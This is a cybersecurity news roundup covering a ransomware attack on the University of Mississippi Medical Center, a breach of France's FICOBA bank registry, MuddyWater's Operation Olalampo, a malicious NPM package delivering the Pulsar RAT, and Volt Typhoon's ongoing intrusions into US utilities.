Ransomware Attack Forces Mississippi’s Largest Health System to Shut Down Statewide Clinics
The University of Mississippi Medical Center (UMMC), the state’s only academic medical center, was hit by a ransomware attack in the early hours of February 19th that knocked out its entire IT network — including the Epic electronic health records platform, phone systems, and booking infrastructure. In response, UMMC shut down all 35 of its clinics statewide, canceled elective procedures and surgeries, and shifted staff to pen-and-paper documentation. Mississippi MED-COM, the statewide hospital transfer coordination network, was also impacted though patient routing continued thanks to built-in redundancies.
Attacker Breaches France’s National Bank Account Registry, Exposing 1.2 Million Accounts
France’s Ministry of Economy disclosed last week that a threat actor accessed FICOBA — the country’s centralized national bank account registry — in late January by impersonating a civil servant and leveraging stolen credentials to query the database. The exposed data for approximately 1.2 million accounts includes IBANs, account holder names and addresses, and in some cases tax identification numbers. Officials were careful to note the breach did not allow access to account balances or the ability to execute transactions, though security experts warn the stolen data is more than sufficient to enable targeted phishing campaigns, identity theft, and fraudulent direct debit setups.
MuddyWater Launches “Operation Olalampo” Against MENA Organizations with New Malware Arsenal
Researchers at Group-IB have published findings on a new campaign by Iran-linked APT MuddyWater (aka Mango Sandstorm, Earth Vetala), dubbed Operation Olalampo, which has been targeting organizations and individuals across the Middle East and North Africa since late January 2026. The campaign introduces several new malware families, including the GhostFetch first-stage downloader, a GhostBackDoor second-stage implant, HTTP_VIP (a native downloader that deploys AnyDesk for remote access), and CHAR — a Rust-based backdoor that receives commands via a Telegram bot. Initial access follows MuddyWater’s established playbook: spear-phishing emails carrying Microsoft Office documents with malicious macros.
Malicious NPM Package Hides Pulsar RAT Inside PNG Images to Evade Detection
Veracode Threat Research has detailed a cleverly crafted supply chain attack in which a typosquatting NPM package named “buildrunner-dev” — designed to impersonate the dormant legitimate “buildrunner” package — delivers the Pulsar Remote Access Trojan to developer systems. The attack combines typosquatting with steganography and process hollowing: the package downloads a batch file at install time from a Codeberg repository, which then extracts a PowerShell AMSI bypass and the full Pulsar RAT payload hidden within the pixel data of PNG images hosted on a public image hosting service. This approach keeps the malicious package itself technically clean of any payload, making static analysis nearly ineffective.
Volt Typhoon Still Embedded in U.S. Critical Infrastructure — Some Compromises May Never Be Found
OT security firm Dragos warned in its annual report that Chinese state-sponsored hackers tied to the Volt Typhoon operation continued actively targeting and compromising U.S. utilities throughout 2025 and remain active today, despite years of public disclosure and law enforcement disruption efforts. Dragos CEO Rob Lee told reporters the group is “absolutely still mapping out and getting into U.S. infrastructure,” and raised a sobering possibility: for lower-resourced critical infrastructure organizations, particularly those in the water sector, some Volt Typhoon compromises may never be found. The group’s use of living-off-the-land techniques and valid credentials makes detection extraordinarily difficult even for well-equipped defenders.
